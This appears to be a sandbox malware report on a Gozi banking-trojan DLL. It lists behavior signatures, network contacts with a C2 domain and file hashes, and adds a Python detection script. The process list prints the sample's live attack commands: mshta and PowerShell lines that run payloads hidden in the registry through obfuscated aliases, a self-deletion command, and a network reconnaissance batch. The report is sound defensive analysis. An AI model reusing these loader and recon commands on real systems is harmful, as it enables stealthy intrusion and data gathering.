Analysis Overview
SHA256
06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
Threat Level: Known bad
The file 61ee6edf7de65.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Blocklisted process makes network request
Deletes itself
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Suspicious behavior: MapViewOfSection
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
Gathers system information
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Runs ping.exe
Discovers systems in the same network
Modifies Internet Explorer settings
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-24 10:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-24 10:09
Reported
2022-01-24 10:11
Platform
win7-en-20211208
Max time kernel
143s
Max time network
122s
Command Line
Signatures
Gozi, Gozi IFSB
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Caveat: the indicator path still contains an unexpanded %ProgramData% token, so the object touched is the Windows PowerShell Start Menu shortcut, not a file under System32. powershell.exe updating its own .lnk at startup is a common and normally benign side effect; this signature should not be read as the sample dropping a file.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1048 set thread context of 1284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1284 set thread context of 1592 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 1592 set thread context of 916 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 1284 set thread context of 1832 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Caveat: mshta.exe hosts the MSHTML engine, and creating the Internet Explorer\Main key is part of that engine initialising; the key creation alone is expected whenever mshta runs and is not by itself evidence of browser settings being changed.
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES535F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B840.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"
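The command lines above are the whole second stage in the clear: the 64-bit rundll32 re-launches the 32-bit DLL under SysWOW64, mshta.exe runs an inline about: HTA that evals script stored in HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, PowerShell hides gp and iex behind random new-alias names to decode and run a second registry value, csc.exe compiles C# on the fly (the .cmdline, .0.cs and .dll files under Temp), the DLL deletes itself behind a ping delay, and a fixed recon batch (systeminfo, net view, nslookup, tasklist /SVC, driverquery, reg query, net config, nltest) is appended to a random-named .bin1 file in Temp and converted to UTF-16 with cmd /U before the intermediate is deleted. The Python below is an added example written for this page, not code from the sandbox or from the sample: it scores process command lines against those patterns. The input list is constructed from the lines above plus two benign lines; the rule names, the recon tool list and the threshold of four distinct tools per output file are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample input: command lines transcribed from the behavioral1 process list on this
# page, plus two benign lines at the end that the rules must leave alone.
SAMPLE_CMDLINES = [
    r'''rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1''',
    r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))''',
    r'''"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"''',
    r'''cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"''',
    r'''cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Process''',
    r'''cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\inventory.txt"''',
]

# mshta running an inline about: HTA whose script pulls its real body out of the registry
MSHTA_RE = re.compile(r'mshta\.exe.*\babout:.*regread\(', re.IGNORECASE)
# new-alias -name <random> -value <cmdlet>; the value may carry a trailing ';'
ALIAS_RE = re.compile(r'new-alias\s+-name\s+(\S+)\s+-value\s+([^\s;]+)', re.IGNORECASE)
IEX_RE = re.compile(r'\b(?:iex|invoke-expression)\b', re.IGNORECASE)
REGREAD_RE = re.compile(r'\b(?:gp|get-itemproperty|get-itempropertyvalue)\b[^;]*\bHK(?:CU|LM):', re.IGNORECASE)
# ping used as a sleep, followed by del of a path: classic self-deletion after unhooking
SELFDEL_RE = re.compile(r'\bping\b.*-n\s+\d+.*&&\s*del\s+"?([^"&]+?)"?\s*$', re.IGNORECASE)
# cmd /C "<tool ...> > file" or ">> file" (also tolerates extra switches such as /U)
REDIRECT_RE = re.compile(r'^cmd(?:\.exe)?\s+(?:/\w\s+)*/C\s+"(.+?)\s+>{1,2}\s+(\S+)"\s*$', re.IGNORECASE)

RECON_TOOLS = ('systeminfo', 'net view', 'net config', 'nslookup', 'tasklist', 'driverquery',
               'reg query', 'nltest', 'whoami', 'ipconfig', 'net group', 'net user')
RECON_THRESHOLD = 4  # distinct tools appended to the same file before we call it a recon batch


def resolve_aliases(cmdline):
    """Undo `new-alias -name X -value Y` indirection so the real cmdlets become visible."""
    aliases = {m.group(1): m.group(2) for m in ALIAS_RE.finditer(cmdline)}
    resolved = cmdline
    for name, value in aliases.items():
        resolved = re.sub(r'\b' + re.escape(name) + r'\b', value, resolved)
    return aliases, resolved


def recon_tool(inner_cmd):
    """Map `tasklist.exe /SVC` or `reg.exe query ...` onto a canonical tool name, or None."""
    norm = re.sub(r'\.exe\b', '', inner_cmd.strip().lower())
    return next((t for t in RECON_TOOLS if norm.startswith(t)), None)


def scan(cmdlines):
    """Return one finding dict per matched pattern; recon batches are grouped by output file."""
    findings = []
    recon_by_file = defaultdict(set)
    for line in cmdlines:
        if MSHTA_RE.search(line):
            findings.append({'rule': 'mshta_registry_hta', 'cmdline': line})
        if 'powershell' in line.lower():
            aliases, resolved = resolve_aliases(line)
            if IEX_RE.search(resolved) and REGREAD_RE.search(resolved):
                findings.append({'rule': 'powershell_alias_hidden_iex', 'aliases': aliases,
                                 'resolved': resolved, 'cmdline': line})
        m = SELFDEL_RE.search(line)
        if m:
            findings.append({'rule': 'delayed_self_delete', 'deleted_path': m.group(1), 'cmdline': line})
        m = REDIRECT_RE.match(line)
        if m:
            tool = recon_tool(m.group(1))
            if tool:
                recon_by_file[m.group(2)].add(tool)
    for out_file, tools in recon_by_file.items():
        if len(tools) >= RECON_THRESHOLD:
            findings.append({'rule': 'recon_batch_to_file', 'output_file': out_file, 'tools': sorted(tools)})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_CMDLINES):
        print(f['rule'], {k: v for k, v in f.items() if k not in ('rule', 'cmdline')})
```

Grouping the recon commands by their redirect target is what makes the last rule robust: each individual cmd /C "net view >> ..." is unremarkable, and the file name changes per run (4868.bin1 here, 2039.bin1 in the Windows 10 run), but six different inventory tools appended to one Temp file within seconds is not something an administrator does by hand. The alias resolution is deliberately simple (whole-word substitution); a real deobfuscator would also have to handle Set-Alias, splatting and string concatenation.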
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | giporedtrip.at | udp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| RU | 45.9.20.190:80 | 45.9.20.190 | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
| ER | 196.200.111.5:80 | giporedtrip.at | tcp |
Files
memory/2040-55-0x00000000760F1000-0x00000000760F3000-memory.dmp
memory/2040-56-0x0000000002020000-0x0000000002030000-memory.dmp
memory/2040-57-0x0000000075040000-0x000000007505C000-memory.dmp
memory/2040-58-0x00000000001A0000-0x00000000001A2000-memory.dmp
memory/1176-59-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp
memory/1048-61-0x000007FEEE460000-0x000007FEEEFBD000-memory.dmp
memory/1048-62-0x00000000028F0000-0x00000000028F2000-memory.dmp
memory/1048-63-0x00000000028F2000-0x00000000028F4000-memory.dmp
memory/1048-64-0x00000000028F4000-0x00000000028F7000-memory.dmp
memory/1048-65-0x00000000028FB000-0x000000000291A000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline
| MD5 | 5fb81d5401d1666bb2ebdce46de74bb2 |
| SHA1 | f425ee95e21bd2af026181537e0bf415bca043e8 |
| SHA256 | 9e91fc6feeb6c697c56fec6c2124ff7b86ec276656ca08d627fa4897766e8846 |
| SHA512 | 3309b0e479217b4d50a85f079d93df35262d3f4e72aea4e5c5f2f444d615505723ed08509bb321b5788f5594909be5dee37202430d8d79b8c5c5bdafd7ee72c6 |
\??\c:\Users\Admin\AppData\Local\Temp\ffdjt0df.0.cs
| MD5 | 04ca9f3dd2f71bc69a66232592bd29b7 |
| SHA1 | 12724cb97fe30a8b84901648b3653b9ac8fb2f73 |
| SHA256 | dbc22ffc06ebcb8f7e00bb962ca175effbbdf0debe7a2e4d288a8735c5c27db1 |
| SHA512 | 383c82a91a354a95e9887e9731852788f466c461ea58a016532e4b07a3e19a97c525b4b579b86a4681bf3dbacfa6b65c8f11032b904737c287a6a5498e4eeb4e |
\??\c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp
| MD5 | 8e2cf73dd9bc2e7b03e5d4f69d25726f |
| SHA1 | 7ce37a0f4c7a43fb570cbc822dcffc9b1b8507ce |
| SHA256 | 4d1064903279344bbf1caafff5de2c5f14230c5b4e077fa036660f03f153c06d |
| SHA512 | a036fafd6876a7211328cce2e23a610decfb40221a3d204a60c8d78e4c811ffaba8173983be66d0834798381e0280adeb9c00be18bb890172269c4293fcd5c67 |
C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp
| MD5 | e4fdd2b90b86f05cb65f8a548880b4fe |
| SHA1 | 27faec1dbad280ff3343a45666dd89f2a8cd7011 |
| SHA256 | a5dd0abe45802e37c75d3c443aa5ac34a0a9ffb4dcf71d766cb8941f67825b54 |
| SHA512 | 88a968468cd8bb53f3a0bcb361a3fbd9b2aded7c1eb60305123d5bc3c7754512e89c845c8cf292d1568b824280263d17a943cdb3e24926404796dccedc0d1de2 |
C:\Users\Admin\AppData\Local\Temp\ffdjt0df.dll
| MD5 | b1f73199330ad52851600286ff7e06df |
| SHA1 | f6020c4ebc4e6ab5cf1143c7697f1a167fc168ed |
| SHA256 | fd49fb763cd68c7553d45c00fa296910b31fcb9c3ea960c5e0ccc7bd20b67bce |
| SHA512 | 3c84b350ef909aa5b0900e5257cd2221dc27565fa9eea4c1a9a79eead1ee5d528a2a0c2adbf32380b00535f5dfca910fbaeb1a9ca66354825881a8e6c727efcc |
C:\Users\Admin\AppData\Local\Temp\ffdjt0df.pdb
| MD5 | 25587e8024f16e00f8f1571f01c7300b |
| SHA1 | 7e139c9c3a2cb2899ab100eb6e448b5e9d5fa6d0 |
| SHA256 | 0d4ce3d4865c6f740003779ed099b72fc429e4bd710db964137fe3a569e86dd5 |
| SHA512 | bfbc07b6cda4c806c0fa933b2d032718ebc24c0e26d687964f22c0c756e3c45818a192b30edd47e530dc9555162fbb3217ec46054253a99c4d0a9b8abb529f93 |
\??\c:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline
| MD5 | 7926d12420a1e669b5215e15c7f8667d |
| SHA1 | 0fca4bb80921f29c0d12a643122bad3efa65c736 |
| SHA256 | ac7611bb61bf5f48cfc9d4fcf291361a1923412994c67ddfd018952a2b8c7e08 |
| SHA512 | a1928982372adacebd021921b5b3ce94c6146f991dcbf1946cc3ed9ac8014612014a46aa5a120a495c806e59b013031595e874e35f0c138e8f7d6406319b606f |
\??\c:\Users\Admin\AppData\Local\Temp\7cp2lteu.0.cs
| MD5 | 35eab9a45b1cc09a0099a179ad3dcfe5 |
| SHA1 | 42939ac7047bc372300fdd21624100e5c9f83b7f |
| SHA256 | eeeecb79a83f234a098d4e685f9649e562ee2c5180da03ce782df3f95d7eb5a7 |
| SHA512 | 03db096cd43e298a526507be3252f718516e26ecb50400d052b9c26e76eb89f950770696f2034fd9031e3421ee5f7e225d985bfd92cc51338ec19854c85017c1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp
| MD5 | 47a585acdf2e3ec7f65178d7e9863e4d |
| SHA1 | d7d7ec9789b1ff3d3ff91106afea8f7a126932e4 |
| SHA256 | 333e2bc83bedd03b460d494dfd6e4454df01b9d2d61991eae6db2ef66c1f070d |
| SHA512 | 68d58a63f14550fc09efe209a44e15c3d6cf9d8c7328188301ff50eaec67f6b65c9655c74648888c12bf6c4179e817388f267e20e330f4a9f9cf344b86eeb4ee |
C:\Users\Admin\AppData\Local\Temp\RES535F.tmp
| MD5 | 54da03f77aea4a11b51e48e5490f69b9 |
| SHA1 | ed0a5f370d1dd80afc0305aecef3d6de6fdfb452 |
| SHA256 | b59c45420ef620c82330e5c6400eddba98180554c144cfb85df738832f80d727 |
| SHA512 | 4295bda8d1b62c191fc54b41a04b6409ef74b8e89f480944767dd463bd21204acc499ad31a33cd8fdea5faa3fb6588d565fc28333d22c22d6ea6c16b4cb976c2 |
C:\Users\Admin\AppData\Local\Temp\7cp2lteu.pdb
| MD5 | a3327dbbc778ac795e0e07a9424813f3 |
| SHA1 | 4cdc64e4a0bdfcb954dbf0b03201c242e340030f |
| SHA256 | 688466a4acafe7ff32bcd803927dcf5545417e080f1e4a9a898d9635eb52e64c |
| SHA512 | 25a826832321ea934e770078c432e9ae91c12aa8f826034ecc58b7d1cd5ef4f4fcb9e36be98d6789a1d6663f3333ecb8b11f1c5e390ebd970957a5e4cdc7a857 |
C:\Users\Admin\AppData\Local\Temp\7cp2lteu.dll
| MD5 | aa1ea0a670bc180dba35e1dbd3242b8c |
| SHA1 | 3869492daab2a9c359b775428305f61ca24a50a1 |
| SHA256 | cce8d0d2e9b4249ea7751f59317124da64afe04e4e39728ee93e44e84f4ea0e0 |
| SHA512 | a3ddbfebe03f58cbbe421935f7a7603488129caa76f32a96729c1bfccbb81267c1d3e439cb34fce73e2e1c1454b7342318adf6b5ed4893efbb3941b00adf4afc |
memory/1048-78-0x000000001B630000-0x000000001B674000-memory.dmp
memory/1284-79-0x0000000002A50000-0x0000000002A51000-memory.dmp
memory/1592-81-0x0000000000310000-0x0000000000311000-memory.dmp
memory/1284-80-0x0000000006B30000-0x0000000006BE8000-memory.dmp
memory/1592-82-0x0000000001B70000-0x0000000001C28000-memory.dmp
memory/916-84-0x0000000001B40000-0x0000000001BF8000-memory.dmp
memory/916-83-0x0000000000180000-0x0000000000181000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B840.bi1
| MD5 | 41a49d1a2a3a8713a12ccf89932d4bb7 |
| SHA1 | b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287 |
| SHA256 | f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe |
| SHA512 | 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1 |
memory/1832-87-0x0000000001C70000-0x0000000001D1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 8b62d5615c7b1ed8d77b89bb66afc7e4 |
| SHA1 | e347adc78d36c0cd75398bdac863a019dddba639 |
| SHA256 | 97899c71ce76baa636d353a51e84cbddca49ee556520ee23e694c4566f2807ba |
| SHA512 | 2c45d2c4ee5accc53ce132475840c9b61cc5d0cdb595ae1c98200e9b5b19542c32852945da34cec132a122e5b384391808dc312036b47309a5af435d04c105fd |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 249139e3b796a2485c3a796f7ae32a7d |
| SHA1 | 5417ace92e2736d1c758f863d42a6e311602ef93 |
| SHA256 | bed15feca86de0bab3ff1bd44cec886797fa3ff93d9b90884dda01ce27cad2bb |
| SHA512 | 821107dc173688e96726590538eae322dc14389d718a33f6935845eda986e2962ee0c3cccfb6e708faf1339ef17db9cf6493017249b12bc3bbae718369066899 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 2d689ad6fef531e6d1dfe4e187c1f8f6 |
| SHA1 | 8180b175fb9c6582ea68a08ba4328634f80a643a |
| SHA256 | c58bfeebfdbdf4c65a4d89c6ef52e60c2a6d423a647adc334833684942196e62 |
| SHA512 | 4b500b21477cdde8245f467ac91dce90ff1c33a24a55d0b668636b7df23adddc0d1f1d9683ad4e10e77feb8c33ed5191669a29c4d531e732c3e0afa15b943dbb |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | caa8caa0a4281f4c4ea04bf0ab032dbe |
| SHA1 | b087a92f7579896ee5641a53ecf1180c4622c6bf |
| SHA256 | 4ecfe3f615314e62111fcfe0f6f134048b0a099795610cae826fd7c0f48b1f4e |
| SHA512 | 8084dd197726dc159f34db8d756ce6295a7c53a72782567ac5907152a992db2d3021124179e7fcd8b7c9b7df65536e32f9be1540a610a965406a2153b66fc201 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | e761b4e3337c16268c826fd35e81725a |
| SHA1 | ee0f5520e87770cb332a332b61395e4cbea83b08 |
| SHA256 | 2ddfa8e7f315d5d3689bd61b188309e9230fcaea89906b80c82bee9bc060bdb3 |
| SHA512 | 5dc9ddae8e9b78db15ea86a8e4ca4d80b00e250bb175df92bf82ce9c581a11af1fefc501a458cd9b474cce463a3515ef6d6f8d9a888179ee1f5dc64b2f868b96 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 5161e2a962f078ef8ac8b55afebe01e1 |
| SHA1 | c3aa0438da514c51b9e4baabcf73c34aa350da93 |
| SHA256 | aa7a60885486cd82350a77733fb33508745127eff517f3112e3fd3918c46a1df |
| SHA512 | b8c0a9dd44a687db88e7eb3ba99d1d364aa1631ad30f2815b5d9044880ede3ff9450ac8ed6165722a0ff5bb59411c83fd6ff9edaa3ff4b1f53eef6a4222e9c49 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 992623c36cb153e5b75afd3161a1b3d6 |
| SHA1 | f2c3d21ee43b85fbb076ea590fbbc52d7d11a845 |
| SHA256 | 60b88997b32b2b8e8b9dc920b0964baf08ed07a903574f7a5872f0432066bb52 |
| SHA512 | 2c08799c252fb31b5b316afcf19026331d5663e2b5bac664f1e1504262d13551343f73edb51ad0102e3c197eeba51999031affa0d3ac5628788a2bd3bbb85e14 |
